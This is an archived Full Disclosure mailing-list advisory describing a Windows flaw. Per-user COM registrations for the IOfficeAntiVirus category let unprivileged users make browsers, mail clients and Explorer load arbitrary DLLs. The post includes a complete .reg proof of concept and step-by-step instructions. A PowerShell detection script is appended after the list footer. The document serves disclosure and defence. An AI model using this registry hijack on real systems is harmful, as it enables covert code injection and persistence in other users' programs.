Date: Sat, 28 Mar 2020 01:07:04 +0100
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <fulldisclosure@...lists.org>
Cc: bugtraq@...urityfocus.com
Subject: [FD] Defense in depth -- the Microsoft way (part 66): attachment manager allows to load arbitrary DLLs

Hi @ll,

this is the continuation of the previous posts
<https://seclists.org/fulldisclosure/2020/Mar/45> and
<https://seclists.org/fulldisclosure/2020/Mar/48>.

(Un)fortunately the IOfficeAntiVirus interface (see
<https://support.microsoft.com/en-us/help/914922/microsoft-windows-defender-helps-provide-real-time-protection>)
has at least another weakness which also allows (unprivileged users) to
load arbitrary DLLs into web browsers, mail/news clients, instant
messengers, file explorer and every other program which calls this COM
interface.

With Windows 2000, Microsoft introduced the "merged view" of the
[HKEY_CLASSES_ROOT] virtual registry tree: see
<https://msdn.microsoft.com/en-us/library/ms724498.aspx>

"Thanks" to this feature, COM categories/classes/interfaces registered by
(unprivileged) users below [HKEY_CURRENT_USER\Software\Classes] obscure the
corresponding COM categories/classes/interfaces registered (by
administrators) below [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]

Demonstration:
~~~~~~~~~~~~~~

On a 32-bit installation of Windows XP SP2 or any newer version of Windows
perform the following steps (adaption for 64-bit installations is left as
an exercise to the reader):

1. Log on to an arbitrary (unprivileged) user account.

2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
   and save it in an arbitrary directory.

3. Create a text file SENTINEL.REG with the following contents:

--- SENTINEL.REG ---
REGEDIT4

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
@="<path>\\SENTINEL.DLL"
; replace <path> with the directory used in step 2.
"ThreadingModel"="Both"

; NOTE: the following entries are optional!

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{56FFCC31-D398-11D0-B2AE-00A0C908FA49}"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
@="{00000000-0000-0000-C000-000000000046}"
; IUnknown

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
@="4"
--- EOF ---

4. Double-click the file SENTINEL.REG to merge it into the user's registry.

5. Download an arbitrary file with your web browser, for example
   <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>, or save
   an attachment in your mail client, and notice the message boxes
   displayed from the sentinels.

NOTE: the batch script <https://skanthak.homepage.t-online.de/download/MSOAV.CMD>
performs all these steps on 32-bit and 64-bit installations of Windows XP
and newer versions of Windows.

Mitigation:
~~~~~~~~~~~

Use AppLocker or SAFER alias Software Restriction Policies: see
<https://skanthak.homepage.t-online.de/SAFER.html>

stay tuned, and NEVER use Windows without SAFER or AppLocker
Stefan Kanthak

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
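As an added defender-side check (not part of Stefan Kanthak's post or his tools), the PowerShell function below lists every per-user COM class that claims the MSOfficeAntiVirus category GUID from the post, the DLL its InProcServer32 entry would load into the calling process, and whether the HKCU entry shadows an HKLM entry in the merged HKEY_CLASSES_ROOT view. The function name and output columns are my own; the category GUID is the one quoted in the .reg file above.

```powershell
# Added example (not from the post): enumerate per-user MSOfficeAntiVirus class
# registrations, which are the ones an unprivileged user can create and which
# the merged HKCR view prefers over the machine-wide registration.
$CatMsOfficeAntiVirus = '{56FFCC30-D398-11D0-B2AE-00A0C908FA49}'  # category GUID from the post

function Get-UserMsOfficeAntiVirusClasses {
    # Native and (on 64-bit Windows) WOW64 per-user class roots
    $userRoots = @('HKCU:\Software\Classes\CLSID', 'HKCU:\Software\Classes\Wow6432Node\CLSID')

    foreach ($root in $userRoots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        # Corresponding machine-wide root, used to detect shadowing
        $machineRoot = $root -replace '^HKCU:\\Software\\Classes', 'HKLM:\SOFTWARE\Classes'

        foreach ($key in Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue) {
            $clsid  = $key.PSChildName
            $catKey = Join-Path $key.PSPath "Implemented Categories\$CatMsOfficeAntiVirus"
            if (-not (Test-Path -LiteralPath $catKey)) { continue }

            # The default value of InProcServer32 is the DLL COM loads in-process
            $serverKey = Join-Path $key.PSPath 'InProcServer32'
            $server = $null
            if (Test-Path -LiteralPath $serverKey) {
                $server = (Get-ItemProperty -LiteralPath $serverKey).'(default)'
            }

            [pscustomobject]@{
                CLSID          = $clsid
                Name           = (Get-ItemProperty -LiteralPath $key.PSPath).'(default)'
                InProcServer32 = $server
                # True when an HKLM class with the same CLSID exists and is hidden by this HKCU entry
                ShadowsMachine = Test-Path -LiteralPath (Join-Path $machineRoot $clsid)
            }
        }
    }
}

Get-UserMsOfficeAntiVirusClasses | Format-Table -AutoSize
```

A legitimately installed scanner registers its class under HKLM, so any row this returns is a per-user registration worth examining; a ShadowsMachine value of True means the merged view hands out the user's DLL in place of the administrator's.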